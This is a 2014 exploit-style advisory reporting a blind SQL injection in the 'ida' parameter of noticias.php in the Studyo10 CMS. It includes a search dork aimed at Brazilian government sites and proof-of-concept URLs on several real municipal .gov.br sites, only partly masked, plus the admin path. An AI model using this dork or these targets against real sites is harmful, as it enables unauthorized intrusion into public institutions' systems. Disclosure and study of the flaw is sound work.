[+] Blind Sql Injection on CMS Studyo10
[+] Date: 27/07/2014
[+] CWE Number : CWE-89
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.studyo10.com.br
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: noticias.php
[+] Dork:studyo10 site:gov.br -studyo10.com.br
[+] Exploit : http://host/site/noticias.php?op=ver_noticia&ida=[Blind SQL Injection ]
[+] PoC: http://www.camarasXXaojosedosul.rs.gov.br/site/noticias.php?op=ver_noticia&ida=5
http://www.linXhXanova.rs.gov.br/noticias.php?op=ver_noticia&ida=5
http://www.salXXvadordosul.rs.gov.br/noticias.php?op=ver_noticia&ida=5
[+] Admin Page: http://host/admin/